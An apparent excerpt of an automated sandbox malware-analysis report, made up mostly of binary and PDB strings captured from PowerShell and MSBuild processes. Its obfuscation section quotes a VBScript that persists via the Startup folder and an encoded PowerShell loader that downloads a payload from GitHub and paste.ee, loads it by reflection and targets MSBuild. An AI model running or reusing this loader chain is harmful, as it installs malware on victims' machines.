            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\MSBuild.pdb" source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Core.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: @;o.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdbL0Fw# source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.0000000001139000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.pdbMZ source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Xml.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\liomioma.vbs");IFileSystem3.CopyFile("C:\Windows\system32\k4STQvJ6rV.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\liomioma.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKyc", "0", "false")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"
